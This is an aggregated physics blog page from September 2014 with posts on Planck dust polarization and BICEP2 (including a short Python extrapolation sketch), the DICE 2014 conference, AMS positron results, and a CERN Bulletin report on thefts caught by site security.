Now some initial results from Planck are in … and it doesn’t look good for gravitational waves. (Warning: I am not a CMB experimentalist or data analyst, so take the below with a grain of salt, though I tried to stick close to the paper itself.)

Planck intermediate results. XXX. The angular power spectrum of polarized dust emission at intermediate and high Galactic latitudes
Planck Collaboration: R. Adam, et al.

The polarized thermal emission from Galactic dust is the main foreground present in measurements of the polarization of the cosmic microwave background (CMB) at frequencies above 100 GHz. We exploit the Planck HFI polarization data from 100 to 353 GHz to measure the dust angular power spectra C_ℓ^{EE,BB} over the range 40 < ℓ < 600. These will bring new insights into interstellar dust physics and a precise determination of the level of contamination for CMB polarization experiments. We show that statistical properties of the emission can be characterized over large fractions of the sky using C_ℓ. For the dust, they are well described by power laws in ℓ with exponents α^{EE,BB} = −2.42 ± 0.02. The amplitudes of the polarization C_ℓ vary with the average brightness in a way similar to the intensity ones. The dust polarization frequency dependence is consistent with modified blackbody emission with β_d = 1.59 and T_d = 19.6 K. We find a systematic ratio between the amplitudes of the Galactic B- and E-modes of 0.5. We show that even in the faintest dust-emitting regions there are no "clean" windows where primordial CMB B-mode polarization could be measured without subtraction of dust emission. Finally, we investigate the level of dust polarization in the BICEP2 experiment field. Extrapolation of the Planck 353 GHz data to 150 GHz gives a dust power ℓ(ℓ+1)C_ℓ^{BB}/(2π) of 1.32×10⁻² μK²_CMB over the 40 < ℓ < 120 range; the statistical uncertainty is ±0.29 and there is an additional uncertainty (+0.28, −0.24) from the extrapolation, both in the same units. This is the same magnitude as reported by BICEP2 over this ℓ range, which highlights the need for assessment of the polarized dust signal. The present uncertainties will be reduced through an ongoing, joint analysis of the Planck and BICEP2 data sets.

We can unpack that a bit, but the upshot is pretty simple: Planck has observed the whole sky, including the BICEP2 region, although not in precisely the same wavelengths. With a bit of extrapolation, however, they can use their data to estimate how big a signal should be generated by dust in our galaxy. The result fits very well with what BICEP2 actually measured. It’s not completely definitive — the Planck paper stresses over and over the need to do more analysis, especially in collaboration with the BICEP2 team — but the simplest interpretation is that BICEP2’s B-modes were caused by local contamination, not by early-universe inflation.
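The frequency-extrapolation step can be sketched numerically. Below is a minimal estimate, assuming only the dust SED quoted in the abstract (a modified blackbody with β_d = 1.59 and T_d = 19.6 K) and the standard conversion to CMB thermodynamic temperature units; the real analysis also folds in instrument bandpasses, colour corrections, and correlated uncertainties, all ignored here.

```python
import math

# Physical constants (SI)
h = 6.62607015e-34   # Planck constant [J s]
k = 1.380649e-23     # Boltzmann constant [J/K]
T_CMB = 2.7255       # CMB monopole temperature [K]

def modified_blackbody(nu, beta=1.59, T_dust=19.6):
    """Dust intensity ~ nu^beta * B_nu(T_dust), unnormalized."""
    x = h * nu / (k * T_dust)
    return nu ** (3 + beta) / math.expm1(x)

def dB_dT_cmb(nu):
    """dB_nu/dT at T_CMB, unnormalized: converts intensity
    to CMB thermodynamic temperature units."""
    x = h * nu / (k * T_CMB)
    return nu ** 4 * math.exp(x) / math.expm1(x) ** 2

def dust_amplitude_ratio(nu_from, nu_to, beta=1.59, T_dust=19.6):
    """Factor by which a dust amplitude in uK_CMB scales
    when extrapolated from nu_from to nu_to."""
    sed = modified_blackbody(nu_to, beta, T_dust) / modified_blackbody(nu_from, beta, T_dust)
    unit = dB_dT_cmb(nu_from) / dB_dT_cmb(nu_to)
    return sed * unit

f = dust_amplitude_ratio(353e9, 150e9)
print(f"amplitude scales by ~{f:.3f}; power (in uK^2) by ~{f**2:.2e}")
```

With these inputs the amplitude factor comes out near 0.045, so the dust power (which goes as amplitude squared) drops by a factor of order 500 between 353 and 150 GHz; any difference from the paper's own extrapolation comes from the effects ignored in this sketch, such as bandpass integration.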

Here’s the Planck sky, color-coded by amount of B-mode polarization generated by dust, with the BICEP2 field indicated at bottom left of the right-hand circle:


Every experiment is different, so the Planck team had to do some work to turn their measurements into a prediction for what BICEP2 should have seen. Here is the sobering result, expressed (roughly) as the expected amount of B-mode polarization as a function of angular size, with large angles on the left. (Really, the BB correlation function as a function of multipole moment.)


The light-blue rectangles are what Planck actually sees and attributes to dust. The black line is the theoretical prediction for what you would see from gravitational waves with the amplitude claimed by BICEP2. As you see, they match very well. That is: the BICEP2 signal is apparently well-explained by dust.
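For orientation, the power law quoted for C_ℓ in the abstract translates into a nearly flat curve in the plotted quantity D_ℓ = ℓ(ℓ+1)C_ℓ/(2π). A minimal sketch, assuming the abstract's exponent α = −2.42 and pinning the amplitude to the quoted 1.32 × 10^−2 μK² at a pivot ℓ = 80 (the pivot is my choice; the abstract quotes only a band average over 40 < ℓ < 120):

```python
# C_ell ~ ell^alpha implies D_ell = ell(ell+1)C_ell/(2*pi) ~ ell^(alpha + 2).
alpha = -2.42

def D_ell(ell, amplitude=1.32e-2, ell_pivot=80):
    """Dust BB power D_ell [uK^2], normalized to 'amplitude' at ell_pivot."""
    return amplitude * (ell / ell_pivot) ** (alpha + 2)

# D_ell falls only slowly (~ ell^-0.42): the dust spectrum is nearly flat
# in D_ell across the BICEP2 range 40 < ell < 120.
print(D_ell(40), D_ell(120))
```

This near-flatness is part of why dust can mimic the shape of a gravitational-wave signal over the limited multipole range BICEP2 probed.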

Of course, just because it could be dust doesn’t mean that it is. As one last check, the Planck team looked at how the amount of signal they saw varied as a function of the frequency of the microwaves they were observing. (BICEP2 was only able to observe at one frequency, 150 GHz.) Here’s the result, compared to a theoretical prediction for what dust should look like:


Again, the data seem to be lining right up with what you would expect from dust.

It’s not completely definitive — but it’s pretty powerful. BICEP2 did indeed observe the signal that they said they observed; but the smart money right now is betting that the signal didn’t come from the early universe. There’s still work to be done, and the universe has plenty of capacity for surprising us, but for the moment we can’t claim to have gathered information from quite as early in the history of the universe as we had hoped.

by Sean Carroll at September 22, 2014 01:13 AM

September 21, 2014

Marco Frasca - The Gauge Connection

DICE 2014

I spent this week in Castiglioncello attending the conference DICE 2014. The conference is held every two years, organized mainly through the efforts of Thomas Elze.

Castello Pasquini at Castiglioncello (DICE 2014)

I participated in the 2006 edition, where I gave a talk about decoherence and the thermodynamic limit (see here and here). This is one of the main conferences where foundational questions can be discussed with the participation of some of the major physicists. This year there were 5 keynote lectures from famous researchers. The opening lecture was given by Tom Kibble, one of the founding fathers of the Higgs mechanism. I met him at the registration desk and was lucky enough to shake his hand and exchange a few words with him; his talk was a recollection of the epic of the Standard Model. The second notable lecturer was Mario Rasetti. Rasetti is working on the question of big data: the huge volume of information currently exchanged on the web, which is difficult to manage, and not only as a matter of quantity. What Rasetti and his group showed is that topological field theory yields striking results when applied to such a case. An application to NMRI of the brain exemplified this vividly.

The third day brought the lectures by Avshalom Elitzur and Alain Connes, the Fields medallist. Elitzur is widely known for the concept of weak measurement, a key idea of quantum optics. Connes presented his recent introduction of the quanta of geometry, which should make loop quantum gravity researchers happy. You can find the main concepts here. Connes explained how the question of the mass of the Higgs got fixed and said that, since his proposal for the geometry of the Standard Model, he has been able to overcome all the setbacks that appeared along the way; this was just another one. From my side, his approach appears really interesting, as the Brownian motion I introduced in quantum mechanics could be understood through the quanta of volume that Connes and collaborators uncovered.

Gerard ‘t Hooft spoke on Thursday. The question he addressed was about cellular automata and quantum mechanics (see here). For several years ‘t Hooft has been looking for a classical substrate to quantum mechanics, and this was also the point of other speakers at the conference. Indeed, he has had some clashes with people working on quantum computation, as ‘t Hooft, following his views, is somewhat sceptical about it. I intervened on this question based on the theorem of Lieb and Simon, generally overlooked in such discussions, defending ‘t Hooft’s ideas and so generating some fuss (see here and the discussion I had with Peter Shor and Aram Harrow). Indeed, we finally agreed that some configurations can evade the Lieb–Simon theorem, granting quantum behaviour at the macroscopic level.

This is my talk at DICE 2014; it was given the same day as ‘t Hooft’s (he was there listening). I was able to prove the existence of fractional powers of Brownian motion and presented new results, including the derivation of the Dirac equation from a stochastic process.

The conference was excellent and I really enjoyed it. I have to thank the organizers for the beautiful atmosphere and the very pleasant stay, with a full immersion in wonderful science. All the speakers gave stimulating and enjoyable talks. For my part, I will keep working on foundational questions and look forward to the next edition.

Marco Frasca (2006). Thermodynamic Limit and Decoherence: Rigorous Results Journal of Physics: Conference Series 67 (2007) 012026 arXiv: quant-ph/0611024v1

Ali H. Chamseddine, Alain Connes, & Viatcheslav Mukhanov (2014). Quanta of Geometry arXiv arXiv: 1409.2471v3

Gerard ‘t Hooft (2014). The Cellular Automaton Interpretation of Quantum Mechanics. A View on the Quantum Nature of our Universe, Compulsory or Impossible? arXiv arXiv: 1405.1548v2

Filed under: Conference, Quantum mechanics Tagged: Alain Connes, Avshalom Elitzur, DICE 2014, Foundations of quantum mechanics, Gerard 't Hooft, Mario Rasetti, Tom Kibble

by mfrasca at September 21, 2014 08:40 PM

September 20, 2014

Michael Schmitt - Collider Blog

New AMS Results – hints of TeV Dark Matter?

Yesterday the AMS Collaboration released updated results on the positron excess. The press release is available at the CERN press release site. (Unfortunately, the AMS web site is down due to a syntax error; I’m sure this will be fixed very soon.)

The Alpha Magnetic Spectrometer was installed three years ago at the International Space Station. As the name implies, it can measure the charge and momenta of charged particles. It can also identify them thanks to a suite of detectors providing redundant and robust information. The project was designed and developed by Prof. Sam Ting (MIT) and his team. An international team, including scientists at CERN, coordinates the analysis of data.

AMS installed on the ISS. Photo from bowshooter blog.

There are more electrons than positrons striking the earth’s atmosphere. Scientists can predict the expected rate of positrons relative to the rate of electrons in the absence of any new phenomena. It is well known that the observed positron rate does not agree with this prediction. This plot shows the deviation of the AMS positron fraction from the prediction. Already at an energy of a couple of GeV, the data have taken off.

AMS positron fraction compared to prediction.

The positron fraction unexpectedly increases starting around 8 GeV. It rises rapidly at first, then more slowly above 10 GeV up to 250 GeV or so. AMS reports that the turnover to a decreasing fraction occurs at 275 ± 32 GeV, though it is difficult to see from the data:

AMS positron fraction.  The upper plot shows the slope.

This turnover, or edge, would correspond notionally to a Jacobian peak; that is, it might indirectly indicate the mass of a decaying particle. The AMS press release mentions dark matter particles with a mass at the TeV scale. It also notes that no sharp structures are observed: the positron fraction may be anomalous, but it is smooth, with no peaks or shoulders. On the other hand, the observed excess is too high for most models of new physics, so one has to be skeptical of such a claim and think carefully about an astrophysical origin of the “excess” positrons (see the nice discussion at Resonaances).

As an experimenter, it is a pleasure to see this nice event display for a positron with a measured energy of 369 GeV:

AMS event display: a high-energy positron

Finally, AMS reports that there is no preferred direction for the positron excess — the distribution is isotropic at the 3% level.

There is no preprint for this article; it was published two days ago in PRL 113 (2014) 121101.

by Michael Schmitt at September 20, 2014 09:16 PM

September 19, 2014

CERN Bulletin

Midsummer mysteries: Criminal masterminds? Not really…

In the summer, when offices are empty and the library is full of new faces, it may seem like a perfect opportunity to steal IT equipment. However, as we know, stealing never pays and thieves always get caught. Just like the person who stole several bikes parked in front of Reception…


Image: Katarina Anthony.

 As we have said many times: security affects us all. It would seem that the crafty little devil who stole four computers from the library (three privately owned and one belonging to CERN) in July hadn’t read our article. This individual naïvely thought that it would be possible to commit the thefts, sell his ill-gotten gains on the CERN Market and still get away with it.

But he was wrong, as the CERN security service and the IT security service were able to identify the guilty party within just a few days.  “The computers had been stolen over a period of four days but it was obvious to us that the same person was responsible,” explains Didier Constant, Head of the Security Service. “Thanks to the IT security service, we could see that the stolen computers had been connected to the CERN network after they were taken and that they had been put up for sale on the CERN Market.”

The thief’s strategic error was blatantly obvious in this case. However, even when the intentions are clear, it is not always so easy to find proof, especially if the thief tries to defend himself with explanations and alibis like a professional criminal. “The Geneva police helped us a lot,” says Didier Constant. “The person eventually admitted to three of the four thefts. He had probably sold the fourth computer outside CERN.”

Fortunately, the security service is never on holiday: also in July, another person thought he could come to CERN on the tram, help himself to a bike parked near Reception and use it to get away, repeating this process several times. “In total, over three weeks, this person stole about 10 bikes,” explains Didier Constant. “In this case we were able to identify the guilty party from our security cameras and the police had a criminal record for him.”

So there you have two very interesting stories. In both cases, it was thanks to tickets created on the CERN Portal that these crimes could be dealt with by experts in the services concerned and by the police. If you see unusual behaviour or if you are the victim of theft, don’t hesitate to report it.

September 19, 2014 09:09 PM